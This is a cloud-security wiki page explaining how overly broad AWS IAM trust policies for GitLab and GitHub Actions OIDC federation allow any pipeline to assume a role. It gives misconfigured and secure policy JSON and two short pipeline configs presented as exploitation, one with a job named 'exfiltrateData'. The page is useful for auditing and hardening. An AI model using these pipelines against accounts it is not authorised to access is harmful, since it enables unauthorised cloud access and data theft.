OpenID Connect (OIDC)

Abusing default or poorly configured Identity Provider IAM Trust Policies for privilege escalation

What is OIDC?

is an authentication protocol based on the OAuth 2.0 framework that eliminates the need for storing and managing passwords
Within AWS, an Identity Provider can be configured for OIDC ID Federation between AWS and the service
An IAM Role along with its Trust Policy and Permissions policy is created and tied to the Identity Provider

GitLab OIDC with AWS

GitLab and AWS can integrate via OIDC, allowing GitLab pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely
If the Role's Trust Policy is misconfigured (or otherwise poorly configured), any GitLab pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

GitLab AWS IAM Role Misconfigured Trust Policy

This IAM Role Trust Policy allows any connection from GitLab.com

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com"
        }
      }
    }
  ]
}

GitLab AWS IAM Role Secure Trust Policy

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com",
          "gitlab.com:sub": "project_path:Engineering/AWS-Deployments:ref_type:branch:ref:main"
        }
      }
    }
  ]
}

This new Trust Policy only allows requests coming from the GitLab Group "Engineering" from the Project "AWS-Deployments" from the "main" branch

GitLab Exploiting the Misconfigured Trust Policy

# .gitlab-ci.yml file 
variables:
  AWS_DEFAULT_REGION: us-east-1
  AWS_PROFILE: "oidc"

oidc:
  image:
    name: amazon/aws-cli:latest
    entrypoint: [""]
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.com
  script:
    - aws sts get-caller-identity

GitHub Actions OIDC with AWS

GitHub and AWS can integrate via OIDC, allowing GitHub pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely
If the Role's Trust Policy is misconfigured (or otherwise poorly configured), any GitHub pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

GitHub Actions AWS IAM Role Misconfigured Trust Policy

This IAM Role Trust Policy allows any connection from GitHub.com

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}

GitHub Actions AWS IAM Role Secure Trust Policy

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
          "token.actions.githubusercontent.com:sub": "repo:MyOrg/MyRepo:ref:refs/heads/main"
        }
      }
    }
  ]
}

GitHub Actions Exploiting the Misconfigured Trust Policy

# .github/workflows/main.yml

name: AWS example workflow
on:
  push
env:
  AWS_REGION : "us-east-1"
# permission can be added at job level or workflow level
permissions:
  id-token: write   # This is required for requesting the JWT
  contents: read    # This is required for actions/checkout
jobs:
  exfiltrateData:
    runs-on: ubuntu-latest
    steps:
      - name: Git clone the repository
        uses: actions/checkout@v4
      - name: configure aws credentials
        uses: aws-actions/configure-aws-credentials@v4.0.2
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github # replace with IAM role to assume
          role-session-name: github-role # can be named whatever, shows in AWS logs
          aws-region: ${{ env.AWS_REGION }}

      - name:  get role identity
        run: |
          aws sts get-caller-identity

PreviousLightsail NextS3

Last updated 4 months ago

Was this helpful?